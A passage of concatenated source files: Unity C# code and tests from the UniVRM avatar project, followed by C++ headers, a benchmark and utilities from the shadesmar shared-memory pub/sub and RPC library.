public void OnSceneGUI()
{
if (m_target.Source == null)
{
return;
}
// this to target line
Handles.color = Color.yellow;
Handles.DrawLine(m_target.Source.position, m_target.transform.position);
var pos = m_target.transform.position;
var pr = TR.FromParent(m_target.transform);
if (m_target.m_src == null)
{
EditorGUI.BeginChangeCheck();
TR.FromWorld(m_target.transform).Draw(0.2f);
Handles.matrix = Matrix4x4.identity;
var rot = Handles.RotationHandle(pr.Rotation * m_target.DestinationOffset, pos);
if (EditorGUI.EndChangeCheck())
{
Undo.RecordObject(m_target, "Rotated RotateAt Point");
m_target.DestinationOffset = Quaternion.Inverse(pr.Rotation) * rot;
}
DrawAimUp(rot, pos, Color.yellow);
}
else
{
var init = pr.Rotation * m_target.m_src.LocalInitial.Rotation;
DrawAimUp(init * m_target.DestinationOffset, m_target.transform.position, Color.yellow);
new TR(init, m_target.transform.position).Draw(0.2f);
DrawAimUp(init * m_target.DestinationOffset * m_target.Delta, m_target.transform.position, Color.magenta);
}
// Target UPVector
Handles.color = Color.green;
Handles.DrawLine(m_target.transform.position, m_target.transform.position + m_target.UpVector);
}
}
}
<|start_filename|>Assets/VRM10/Runtime/Components/Constraint/ConstraintSource.cs<|end_filename|>
using UnityEngine;
using System;
using UniGLTF.Extensions.VRMC_node_constraint;
namespace UniVRM10
{
public class ConstraintSource
{
public readonly Transform ModelRoot;
readonly Transform Source;
public readonly TR ModelInitial;
public readonly TR LocalInitial;
public TR Delta(ObjectSpace coords, Quaternion sourceRotationOffset)
{
switch (coords)
{
// case SourceCoordinates.World: return m_transform.rotation * Quaternion.Inverse(m_initial.Rotation);
case ObjectSpace.local: return TR.FromLocal(Source) * (LocalInitial * new TR(sourceRotationOffset)).Inverse();
case ObjectSpace.model: return TR.FromWorld(Source) * (TR.FromParent(ModelRoot) * ModelInitial * new TR(sourceRotationOffset)).Inverse();
default: throw new NotImplementedException();
}
}
public ConstraintSource(Transform t, Transform modelRoot = null)
{
{
Source = t;
LocalInitial = TR.FromLocal(t);
}
if (modelRoot != null)
{
ModelRoot = modelRoot;
ModelInitial = TR.FromLocal(t);
}
}
}
}
<|start_filename|>Assets/VRM10/Runtime/Components/SpringBone/VRM10SpringBoneJoint.cs<|end_filename|>
using System;
using System.Collections.Generic;
using UnityEngine;
#if UNITY_EDITOR
using UnityEditor;
#endif
namespace UniVRM10
{
[Serializable]
public class VRM10SpringBoneJoint : MonoBehaviour
{
[SerializeField, Range(0, 4), Header("Settings")]
public float m_stiffnessForce = 1.0f;
[SerializeField, Range(0, 2)]
public float m_gravityPower = 0;
[SerializeField]
public Vector3 m_gravityDir = new Vector3(0, -1.0f, 0);
[SerializeField, Range(0, 1)]
public float m_dragForce = 0.4f;
[SerializeField]
public bool m_exclude;
[SerializeField, Range(0, 0.5f), Header("Collision")]
public float m_jointRadius = 0.02f;
public void DrawGizmo(Transform center, Color color)
{
#if UNITY_EDITOR
// Gizmos.matrix = Transform.localToWorldMatrix;
Gizmos.color = color;
Gizmos.DrawSphere(transform.position, m_jointRadius);
#endif
}
}
}
<|start_filename|>Assets/VRM10/Tests/MaterialImportTests.cs<|end_filename|>
using System.IO;
using System.Linq;
using NUnit.Framework;
using UniGLTF;
using UnityEngine;
using VRMShaders;
namespace UniVRM10
{
public class MaterialImporterTests
{
static string AliciaPath
{
get
{
return Path.GetFullPath(Application.dataPath + "/../Tests/Models/Alicia_vrm-0.51/AliciaSolid_vrm-0.51.vrm")
.Replace("\\", "/");
}
}
[Test]
public void MaterialImporterTest()
{
var migratedBytes = MigrationVrm.Migrate(File.ReadAllBytes(AliciaPath));
var data = new GlbLowLevelParser(AliciaPath, migratedBytes).Parse();
var matDesc = new Vrm10MaterialDescriptorGenerator().Get(data, 0);
Assert.AreEqual("Alicia_body", matDesc.Name);
Assert.AreEqual("VRM10/MToon10", matDesc.ShaderName);
Assert.AreEqual("Alicia_body", matDesc.TextureSlots["_MainTex"].UnityObjectName);
Assert.AreEqual("Alicia_body", matDesc.TextureSlots["_ShadeTex"].UnityObjectName);
AreColorEqualApproximately(new Color(1, 1, 1, 1), matDesc.Colors["_Color"]);
ColorUtility.TryParseHtmlString("#FFDDD6", out var shadeColor);
AreColorEqualApproximately(shadeColor, matDesc.Colors["_ShadeColor"]);
Assert.AreEqual(1.0f - 0.1f, matDesc.FloatValues["_GiEqualization"]);
var (key, value) = matDesc.EnumerateSubAssetKeyValue().First();
Assert.AreEqual(new SubAssetKey(typeof(Texture2D), "Alicia_body"), key);
}
private void AreColorEqualApproximately(Color expected, Color actual)
{
Assert.AreEqual(Mathf.RoundToInt(expected.r * 255), Mathf.RoundToInt(actual.r * 255));
Assert.AreEqual(Mathf.RoundToInt(expected.g * 255), Mathf.RoundToInt(actual.g * 255));
Assert.AreEqual(Mathf.RoundToInt(expected.b * 255), Mathf.RoundToInt(actual.b * 255));
Assert.AreEqual(Mathf.RoundToInt(expected.a * 255), Mathf.RoundToInt(actual.a * 255));
}
}
}
<|start_filename|>Assets/UniGLTF/Tests/UniGLTF/TextureTests.cs<|end_filename|>
using System;
using System.IO;
using System.Linq;
using NUnit.Framework;
using UnityEngine;
using VRMShaders;
namespace UniGLTF
{
public class TextureTests
{
[Test]
public void TextureExportTest()
{
// Dummy texture
var tex0 = new Texture2D(128, 128)
{
wrapMode = TextureWrapMode.Clamp,
filterMode = FilterMode.Trilinear,
};
var textureExporter = new TextureExporter(new EditorTextureSerializer());
var material = new Material(Shader.Find("Standard"));
material.mainTexture = tex0;
var materialExporter = new MaterialExporter();
materialExporter.ExportMaterial(material, textureExporter, new GltfExportSettings());
var exported = textureExporter.Export();
var (convTex0, colorSpace) = exported[0];
var sampler = TextureSamplerUtil.Export(convTex0);
Assert.AreEqual(glWrap.CLAMP_TO_EDGE, sampler.wrapS);
Assert.AreEqual(glWrap.CLAMP_TO_EDGE, sampler.wrapT);
Assert.AreEqual(FilterMode.Trilinear, convTex0.filterMode);
Assert.IsTrue(convTex0.mipmapCount > 1);
// Tirilinear => LINEAR_MIPMAP_LINEAR
Assert.AreEqual(glFilter.LINEAR_MIPMAP_LINEAR, sampler.minFilter);
Assert.AreEqual(glFilter.LINEAR, sampler.magFilter);
}
static FileInfo Find(DirectoryInfo current, string target)
{
foreach (var child in current.EnumerateFiles())
{
if (child.Name == target)
{
return child;
}
}
foreach (var child in current.EnumerateDirectories())
{
var found = Find(child, target);
if (found != null)
{
return found;
}
}
return null;
}
static FileInfo GetGltfTestModelPath(string name)
{
var env = System.Environment.GetEnvironmentVariable("GLTF_SAMPLE_MODELS");
if (string.IsNullOrEmpty(env))
{
return null;
}
var root = new DirectoryInfo($"{env}/2.0");
if (!root.Exists)
{
return null;
}
return Find(root, name);
}
[Test]
public void TextureExtractTest()
{
var path = GetGltfTestModelPath("BoomBox.glb");
if (path == null)
{
return;
}
// parse
var data = new GlbFileParser(path.FullName).Parse();
// load
using (var context = new ImporterContext(data))
{
var instance = context.Load();
var textureMap = instance.RuntimeResources
.Select(kv => (kv.Item1, kv.Item2 as Texture))
.Where(kv => kv.Item2 != null)
.ToDictionary(kv => kv.Item1, kv => kv.Item2)
;
// extractor
var extractor = new TextureExtractor(data, UnityPath.FromUnityPath(""), textureMap);
var m = context.TextureDescriptorGenerator.Get().GetEnumerable()
.FirstOrDefault(x => x.SubAssetKey.Name == "texture_1.standard");
Assert.Catch<NotImplementedException>(() => extractor.Extract(m.SubAssetKey, m));
}
}
}
}
| gonnavis/UniVRM |
<|start_filename|>include/shadesmar/rpc/client.h<|end_filename|>
/* MIT License
Copyright (c) 2021 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#ifndef INCLUDE_SHADESMAR_RPC_CLIENT_H_
#define INCLUDE_SHADESMAR_RPC_CLIENT_H_
#include <memory>
#include <string>
#include <utility>
#include "shadesmar/memory/copier.h"
#include "shadesmar/memory/memory.h"
#include "shadesmar/rpc/channel.h"
namespace shm::rpc {
class Client {
public:
explicit Client(const std::string &channel_name);
Client(const std::string &channel_name,
std::shared_ptr<memory::Copier> copier);
Client(const Client &) = delete;
Client(Client &&);
bool call(const memory::Memblock &req, memory::Memblock *resp) const;
bool send(const memory::Memblock &req, uint32_t *pos) const;
bool recv(uint32_t pos, memory::Memblock *resp) const;
void free_resp(memory::Memblock *resp) const;
private:
std::string channel_name_;
std::unique_ptr<Channel> channel_;
};
Client::Client(const std::string &channel_name) : channel_name_(channel_name) {
channel_ = std::make_unique<Channel>(channel_name);
}
Client::Client(const std::string &channel_name,
std::shared_ptr<memory::Copier> copier)
: channel_name_(channel_name) {
channel_ = std::make_unique<Channel>(channel_name, copier);
}
Client::Client(Client &&other) {
channel_name_ = other.channel_name_;
channel_ = std::move(other.channel_);
}
bool Client::call(const memory::Memblock &req, memory::Memblock *resp) const {
uint32_t pos;
bool success = send(req, &pos);
if (!success) return success;
return recv(pos, resp);
}
bool Client::send(const memory::Memblock &req, uint32_t *pos) const {
return channel_->write_client(req, pos);
}
bool Client::recv(uint32_t pos, memory::Memblock *resp) const {
return channel_->read_client(pos, resp);
}
void Client::free_resp(memory::Memblock *resp) const {
channel_->copier()->dealloc(resp->ptr);
resp->ptr = nullptr;
resp->size = 0;
}
} // namespace shm::rpc
#endif // INCLUDE_SHADESMAR_RPC_CLIENT_H_
<|start_filename|>include/shadesmar/concurrency/robust_lock.h<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#ifndef INCLUDE_SHADESMAR_CONCURRENCY_ROBUST_LOCK_H_
#define INCLUDE_SHADESMAR_CONCURRENCY_ROBUST_LOCK_H_
#include <unistd.h>
#include <cerrno>
#include <iostream>
#include <string>
#include <thread>
#include "shadesmar/concurrency/lock.h"
#include "shadesmar/concurrency/lockless_set.h"
#include "shadesmar/concurrency/rw_lock.h"
#include "shadesmar/macros.h"
namespace shm::concurrent {
class RobustLock {
public:
RobustLock();
RobustLock(const RobustLock &);
~RobustLock();
void lock();
bool try_lock();
void unlock();
void lock_sharable();
bool try_lock_sharable();
void unlock_sharable();
void reset();
private:
void prune_readers();
PthreadReadWriteLock mutex_;
std::atomic<__pid_t> exclusive_owner{0};
LocklessSet<8> shared_owners;
};
RobustLock::RobustLock() = default;
RobustLock::RobustLock(const RobustLock &lock) {
mutex_ = lock.mutex_;
exclusive_owner.store(lock.exclusive_owner.load());
shared_owners = lock.shared_owners;
}
RobustLock::~RobustLock() { exclusive_owner = 0; }
void RobustLock::lock() {
while (!mutex_.try_lock()) {
if (exclusive_owner.load() != 0) {
auto ex_proc = exclusive_owner.load();
if (proc_dead(ex_proc)) {
if (exclusive_owner.compare_exchange_strong(ex_proc, 0)) {
mutex_.unlock();
continue;
}
}
} else {
prune_readers();
}
std::this_thread::sleep_for(std::chrono::microseconds(1));
}
exclusive_owner = getpid();
}
bool RobustLock::try_lock() {
if (!mutex_.try_lock()) {
if (exclusive_owner != 0) {
auto ex_proc = exclusive_owner.load();
if (proc_dead(ex_proc)) {
if (exclusive_owner.compare_exchange_strong(ex_proc, 0)) {
mutex_.unlock();
}
}
} else {
prune_readers();
}
if (mutex_.try_lock()) {
exclusive_owner = getpid();
return true;
} else {
return false;
}
} else {
exclusive_owner = getpid();
return true;
}
}
void RobustLock::unlock() {
__pid_t current_pid = getpid();
if (exclusive_owner.compare_exchange_strong(current_pid, 0)) {
mutex_.unlock();
}
}
void RobustLock::lock_sharable() {
while (!mutex_.try_lock_sharable()) {
if (exclusive_owner != 0) {
auto ex_proc = exclusive_owner.load();
if (proc_dead(ex_proc)) {
if (exclusive_owner.compare_exchange_strong(ex_proc, 0)) {
exclusive_owner = 0;
mutex_.unlock();
}
}
}
std::this_thread::sleep_for(std::chrono::microseconds(1));
}
while (!shared_owners.insert(getpid())) {
}
}
bool RobustLock::try_lock_sharable() {
if (!mutex_.try_lock_sharable()) {
if (exclusive_owner != 0) {
auto ex_proc = exclusive_owner.load();
if (proc_dead(ex_proc)) {
if (exclusive_owner.compare_exchange_strong(ex_proc, 0)) {
exclusive_owner = 0;
mutex_.unlock();
}
}
}
if (mutex_.try_lock_sharable()) {
while (!shared_owners.insert(getpid())) {
}
return true;
} else {
return false;
}
} else {
while (!shared_owners.insert(getpid())) {
}
return true;
}
}
void RobustLock::unlock_sharable() {
if (shared_owners.remove(getpid())) {
mutex_.unlock_sharable();
}
}
void RobustLock::reset() { mutex_.reset(); }
void RobustLock::prune_readers() {
for (auto &i : shared_owners.array_) {
uint32_t shared_owner = i.load();
if (shared_owner == 0) continue;
if (proc_dead(shared_owner)) {
if (shared_owners.remove(shared_owner)) {
mutex_.unlock_sharable();
}
}
}
}
} // namespace shm::concurrent
#endif // INCLUDE_SHADESMAR_CONCURRENCY_ROBUST_LOCK_H_
<|start_filename|>benchmark/pubsub.cpp<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#include <cassert>
#include <chrono>
#include <iostream>
#ifdef SINGLE_HEADER
#include "shadesmar.h"
#else
#include "shadesmar/memory/copier.h"
#include "shadesmar/memory/dragons.h"
#include "shadesmar/pubsub/publisher.h"
#include "shadesmar/pubsub/subscriber.h"
#include "shadesmar/stats.h"
#endif
const char topic[] = "raw_benchmark_topic";
shm::stats::Welford per_second_lag;
struct Message {
uint64_t count;
uint64_t timestamp;
uint8_t *data;
};
uint64_t current_count = 0;
void callback(shm::memory::Memblock *memblock) {
if (memblock->is_empty()) {
return;
}
auto *msg = reinterpret_cast<Message *>(memblock->ptr);
auto lag = shm::current_time() - msg->timestamp;
// assert(current_count == msg->count - 1);
assert(current_count < msg->count);
current_count = msg->count;
per_second_lag.add(lag);
}
void subscribe_loop(int seconds) {
shm::pubsub::Subscriber sub(topic, callback);
for (int sec = 0; sec < seconds; ++sec) {
auto start = std::chrono::steady_clock::now();
for (auto now = start; now < start + std::chrono::seconds(1);
now = std::chrono::steady_clock::now()) {
sub.spin_once();
}
std::cout << per_second_lag << std::endl;
per_second_lag.clear();
}
}
void publish_loop(int seconds, int vector_size) {
std::cout << "Number of bytes = " << vector_size << std::endl;
std::cout << "Time unit = " << TIMESCALE_NAME << std::endl;
auto *rawptr = malloc(vector_size);
std::memset(rawptr, 255, vector_size);
Message *msg = reinterpret_cast<Message *>(rawptr);
msg->count = 0;
shm::pubsub::Publisher pub(topic);
auto start = std::chrono::steady_clock::now();
for (auto now = start; now < start + std::chrono::seconds(seconds);
now = std::chrono::steady_clock::now()) {
msg->count++;
msg->timestamp = shm::current_time();
pub.publish(msg, vector_size);
}
free(msg);
}
int main() {
const int SECONDS = 10;
const int VECTOR_SIZE = 32 * 1024;
std::thread subscribe_thread(subscribe_loop, SECONDS);
std::thread publish_thread(publish_loop, SECONDS, VECTOR_SIZE);
subscribe_thread.join();
publish_thread.join();
}
<|start_filename|>src/flush_tmp.cpp<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#include <sys/mman.h>
#include <iostream>
#include "shadesmar/memory/tmp.h"
void flush(std::string const &topic) {
std::cout << "Flushing " << topic << std::endl;
shm_unlink(topic.c_str());
}
int main(int argc, char **argv) {
if (argc == 1) {
for (auto &topic : shm::memory::tmp::get_tmp_names()) {
flush(topic);
}
shm::memory::tmp::delete_topics();
} else {
flush(std::string(argv[1]));
}
}
<|start_filename|>include/shadesmar/pubsub/topic.h<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#ifndef INCLUDE_SHADESMAR_PUBSUB_TOPIC_H_
#define INCLUDE_SHADESMAR_PUBSUB_TOPIC_H_
#include <atomic>
#include <cstring>
#include <iostream>
#include <memory>
#include <string>
#include "shadesmar/concurrency/scope.h"
#include "shadesmar/macros.h"
#include "shadesmar/memory/allocator.h"
#include "shadesmar/memory/copier.h"
#include "shadesmar/memory/memory.h"
namespace shm::pubsub {
// The logic for optimistically jumping ahead, if the current read
// logic has fallen behind (circular wrap around). `counter` is the
// current write head location.
inline uint32_t jumpahead(uint32_t counter, uint32_t queue_size) {
return counter - queue_size / 2;
}
template <class LockT>
struct TopicElemT {
memory::Element msg;
LockT mutex;
TopicElemT() : msg(), mutex() {}
TopicElemT(const TopicElemT &topic_elem) {
msg = topic_elem.msg;
mutex = topic_elem.mutex;
}
void reset() {
msg.reset();
mutex.reset();
}
};
using LockType = concurrent::PthreadReadWriteLock;
class Topic {
using TopicElem = TopicElemT<LockType>;
template <concurrent::ExlOrShr type>
using Scope = concurrent::ScopeGuard<LockType, type>;
public:
explicit Topic(const std::string &topic)
: Topic(topic, std::make_shared<memory::DefaultCopier>()) {}
Topic(const std::string &topic, std::shared_ptr<memory::Copier> copier)
: memory_(topic) {
if (copier == nullptr) {
copier = std::make_shared<memory::DefaultCopier>();
}
copier_ = copier;
}
~Topic() = default;
bool write(memory::Memblock memblock) {
/*
* Writes always happen at the head of the circular queue, the
* head is atomically incremented to prevent any race across
* processes. The head of the queue is stored as a counter
* on shared memory.
*/
if (memblock.size > memory_.allocator_->get_free_memory()) {
std::cerr << "Increase buffer_size" << std::endl;
return false;
}
uint32_t q_pos = counter() & (queue_size() - 1);
TopicElem *elem = &(memory_.shared_queue_->elements[q_pos]);
/*
* Code path:
* 1. Allocate shared memory buffer `new_address`
* 2. Copy msg data to `new_address`
* 3. Acquire exclusive lock
* 4. Complex "swap" of old and new fields
* 5. Release exclusive lock
* 6. If old buffer is empty, deallocate it
*/
uint8_t *new_address = memory_.allocator_->alloc(memblock.size);
if (new_address == nullptr) {
return false;
}
copier_->user_to_shm(new_address, memblock.ptr, memblock.size);
uint8_t *old_address = nullptr;
{
/*
* This locked block should *only* contain accesses
* to `elem`, any other expensive compute that doesn't
* include `elem` can be put outside this block.
*/
Scope<concurrent::EXCLUSIVE> _(&elem->mutex);
if (!elem->msg.empty) {
old_address =
memory_.allocator_->handle_to_ptr(elem->msg.address_handle);
}
elem->msg.address_handle =
memory_.allocator_->ptr_to_handle(new_address);
elem->msg.size = memblock.size;
elem->msg.empty = false;
}
while (!memory_.allocator_->free(old_address)) {
std::this_thread::sleep_for(std::chrono::microseconds(100));
}
inc_counter();
return true;
}
/*
* Reads aren't like writes in one major way: writes don't require
* any information about which position in the queue to write to. It
* defaults to the head of the queue. Reads requires an explicit
* position in the queue to read(`pos`). We use this position
* argument since we need to support multiple subscribers each
* reading at their own pace. Between picking the element at pos to
* read from and acquiring a read lock, the publisher may write a new
* value at pos. In this case, we implement a slow path to jump ahead.
*/
bool read(memory::Memblock *memblock, std::atomic<uint32_t> *pos) {
TopicElem *elem =
&(memory_.shared_queue_->elements[*pos & (queue_size() - 1)]);
/*
* Code path (without the slow path for lag):
* 1. Acquire sharable lock
* 2. Check for emptiness
* 3. Copy from shared memory to input param `msg`
* 4. Release sharable lock
*/
Scope<concurrent::SHARED> _(&elem->mutex);
// Using a lambda for this reduced throughput.
#define MOVE_ELEM(_elem) \
if (_elem->msg.empty) { \
return false; \
} \
auto *dst = memory_.allocator_->handle_to_ptr(_elem->msg.address_handle); \
memblock->size = _elem->msg.size; \
memblock->ptr = copier_->alloc(memblock->size); \
copier_->shm_to_user(memblock->ptr, dst, memblock->size);
if (queue_size() > counter() - *pos) {
// Fast path.
MOVE_ELEM(elem);
return true;
}
// See comment in `pubsub/subscriber.h`, in function `get_message()` for
// more info. *pos is outdated, the publisher has already written here
// before the reader lock was held. Jump ahead optimisically.
//
// Q: Why no lock on `next_best_elem`?
// A: `elem` is behind `next_best_elem`. With a lock on the former, the
// publisher cannot cross `elem` to get to `next_best_elem`.
//
// Q: Why is the jump ahead implemented again in `get_message()`?
// A: `get_message()` can jump ahead outside of holding a lock. If a
// lag can be detected there, it is more performant. This is a slow
// path under a read lock.
*pos = jumpahead(counter(), queue_size());
TopicElem *next_best_elem =
&(memory_.shared_queue_->elements[*pos & (queue_size() - 1)]);
MOVE_ELEM(next_best_elem);
return true;
#undef MOVE_ELEM
}
inline __attribute__((always_inline)) void inc_counter() {
memory_.shared_queue_->counter++;
}
inline __attribute__((always_inline)) uint32_t counter() const {
return memory_.shared_queue_->counter.load();
}
size_t queue_size() const { return memory_.queue_size(); }
inline std::shared_ptr<memory::Copier> copier() const { return copier_; }
private:
memory::Memory<TopicElem, memory::Allocator> memory_;
std::shared_ptr<memory::Copier> copier_;
};
} // namespace shm::pubsub
#endif // INCLUDE_SHADESMAR_PUBSUB_TOPIC_H_
<|start_filename|>include/shadesmar/pubsub/publisher.h<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#ifndef INCLUDE_SHADESMAR_PUBSUB_PUBLISHER_H_
#define INCLUDE_SHADESMAR_PUBSUB_PUBLISHER_H_
#include <cstdint>
#include <cstring>
#include <iostream>
#include <memory>
#include <string>
#include <utility>
#include "shadesmar/memory/copier.h"
#include "shadesmar/pubsub/topic.h"
namespace shm::pubsub {
class Publisher {
public:
explicit Publisher(const std::string &topic_name);
Publisher(const std::string &topic_name,
std::shared_ptr<memory::Copier> copier);
Publisher(const Publisher &) = delete;
Publisher(Publisher &&);
bool publish(void *data, size_t size);
private:
std::string topic_name_;
std::unique_ptr<Topic> topic_;
};
Publisher::Publisher(const std::string &topic_name) : topic_name_(topic_name) {
topic_ = std::make_unique<Topic>(topic_name);
}
Publisher::Publisher(const std::string &topic_name,
std::shared_ptr<memory::Copier> copier)
: topic_name_(topic_name) {
topic_ = std::make_unique<Topic>(topic_name, copier);
}
Publisher::Publisher(Publisher &&other) {
topic_name_ = other.topic_name_;
topic_ = std::move(other.topic_);
}
bool Publisher::publish(void *data, size_t size) {
memory::Memblock memblock(data, size);
return topic_->write(memblock);
}
} // namespace shm::pubsub
#endif // INCLUDE_SHADESMAR_PUBSUB_PUBLISHER_H_
<|start_filename|>include/shadesmar/memory/tmp.h<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#ifndef INCLUDE_SHADESMAR_MEMORY_TMP_H_
#define INCLUDE_SHADESMAR_MEMORY_TMP_H_
#include <sys/stat.h>
#include <algorithm>
#include <fstream>
#include <iterator>
#include <random>
#include <string>
#include <vector>
#include "shadesmar/memory/filesystem.h"
namespace shm::memory::tmp {
char const default_chars[] =
"abcdefghijklmnaoqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
char const tmp_prefix[] = "/tmp/shm/";
inline std::string random_string(size_t len = 15) {
std::mt19937_64 gen{std::random_device()()};
std::uniform_int_distribution<size_t> dist{0, sizeof(default_chars) - 1};
std::string ret;
std::generate_n(std::back_inserter(ret), len,
[&] { return default_chars[dist(gen)]; });
return ret;
}
inline bool file_exists(const std::string &file_name) {
// POSIX only
struct stat buffer {};
return (stat(file_name.c_str(), &buffer) == 0);
}
inline void write(const std::string &name) {
if (!file_exists(tmp_prefix)) {
std::filesystem::create_directories(tmp_prefix);
}
std::fstream file;
std::string file_name = tmp_prefix + random_string();
file.open(file_name, std::ios::out);
file << name.c_str() << std::endl;
file.close();
}
inline std::vector<std::string> get_tmp_names() {
std::vector<std::string> names{};
if (!file_exists(tmp_prefix)) {
return names;
}
for (const auto &entry : std::filesystem::directory_iterator(tmp_prefix)) {
